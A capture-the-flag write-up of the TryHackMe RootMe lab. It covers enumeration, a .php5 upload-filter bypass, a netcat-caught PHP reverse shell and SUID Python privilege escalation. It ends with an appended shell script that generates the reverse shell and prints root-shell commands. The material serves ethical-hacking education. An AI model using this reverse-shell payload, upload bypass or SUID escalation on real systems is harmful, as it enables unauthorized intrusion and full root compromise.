TryHackMe CTF: RootMe
The RootMe room is a beginner-friendly challenge for people starting out in ethical hacking and penetration testing. It covers the fundamentals of the hacking methodology: enumeration, vulnerability scanning, and privilege escalation.
Room link: https://tryhackme.com/room/rrootme
Type: Free
Difficulty: Easy
Tools used in this write-up:
- nmap
- gobuster
- msfvenom (optional)
- netcat
We start our enumeration by running nmap to detect open ports, adding -sC and -sV so that the default scripts run against the open ports and service versions are enumerated. Ports 22 (SSH) and 80 (HTTP) are open.
Nothing interesting is visible on the web server's home page, so we run a directory brute-force with gobuster, using the default wordlist found at /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt on Linux systems. We quickly find two interesting directories: uploads and panel.
After visiting both pages in the browser, we see that panel is a file upload form and uploads is the directory where the uploaded files are stored and served from.
To find out which language the web server uses, we request the index page with different extensions (index.html, index.aspx, index.php). The server returns the home page for index.php, which indicates that the back end is PHP.

Now we try to upload a simple PHP reverse shell. We can write one manually or let msfvenom generate it; I'll write one manually. $ip is my IP address and $port is the port I'll listen on to catch the shell. Then we try to upload it via /panel.

The upload is rejected with a message saying that PHP files are not allowed. We bypass the check by changing the file extension from .php to an alternative such as .php5 (the extensions commonly handled as PHP are .php, .php4, .php5 and .phtml, but note that not every web server configuration executes them). It worked with .php5!

Next we start a netcat listener on the port we defined in our shell (in my case 4242), navigate to /uploads and click on the reverse shell we uploaded. That gives us a reverse shell in our terminal, and we can read the user flag.

We now have a shell as the web server user (www-data), which has limited privileges, so it's time to escalate to a root shell. We look for SUID files with find / -user root -perm /4000 2>/dev/null, which lists files owned by root that have the SUID bit set; errors are sent to /dev/null so the output stays clean. Finding the Python binary /usr/bin/python with the SUID bit set is unusual, and we can easily get a root shell by spawning a shell through it. To get the command, search for python on https://gtfobins.github.io/ and open the SUID section. Skip the first command (it only creates a SUID copy of the binary for testing) and type the second one on the target machine.

We got a root shell! The root flag can now be retrieved from /root.

My personal notes for the room (I write them in Obsidian):
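As an added example, not code from the original write-up, the POSIX shell helpers below script the chain described above: writing the .php5 reverse shell, triaging the SUID listing produced by the find command, and producing the GTFOBins-style command for the unusual binary. The function names, the EXPECTED_SUID baseline, the sample paths and the IP 10.0.0.5 are my assumptions.

```shell
# Added example, not code from the original write-up. Function names, the
# EXPECTED_SUID baseline and the sample values used below are assumptions.

# 1. Write a minimal PHP reverse shell. $1 = attacker IP, $2 = listener port,
#    $3 = output path. Give it a .php5 extension: the /panel filter only
#    rejects ".php", yet the server still executes .php5 as PHP.
make_php_shell() {
    ip="$1"; port="$2"; out="$3"
    cat > "$out" <<EOF
<?php
// Connect back to the listener and attach an interactive /bin/sh to the socket.
\$sock = fsockopen("$ip", $port);
if (\$sock === false) { die("connect failed"); }
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
EOF
    printf '%s\n' "$out"
}

# 2. Triage a SUID listing read from stdin, one path per line (on the target:
#    find / -user root -perm /4000 2>/dev/null | triage_suid). Binaries that are
#    SUID root on a stock Debian/Ubuntu box are skipped; anything else is printed.
EXPECTED_SUID='passwd su sudo mount umount chsh chfn gpasswd newgrp ping ping6 pkexec fusermount'

triage_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        case " $EXPECTED_SUID " in
            *" $(basename "$path") "*) ;;   # expected on a stock system: skip
            *) printf '%s\n' "$path" ;;     # unusual: report for a GTFOBins lookup
        esac
    done
}

# 3. GTFOBins SUID recipes for a few binaries. "-p" tells sh to keep the
#    elevated effective UID (root) instead of dropping back to www-data.
suid_exploit_cmd() {
    bin="$1"
    case "$(basename "$bin")" in
        python|python2|python3)
            printf '%s\n' "$bin -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'" ;;
        bash) printf '%s\n' "$bin -p" ;;
        find) printf '%s\n' "$bin . -exec /bin/sh -p \\; -quit" ;;
        *)    printf '%s\n' "no recipe here for $bin; look it up at https://gtfobins.github.io/" ;;
    esac
}

# Usage on the attacker box (constructed values):
#   make_php_shell 10.0.0.5 4242 shell.php5   # then upload it via /panel
#   nc -lvnp 4242                             # then open /uploads/shell.php5
# On the target, once the www-data shell is in:
#   find / -user root -perm /4000 2>/dev/null | triage_suid
#   suid_exploit_cmd /usr/bin/python
```

The -p flag is the detail most often missed: a SUID interpreter hands you euid 0, but a shell started without -p resets its effective UID to the real one, so the root shell silently becomes www-data again.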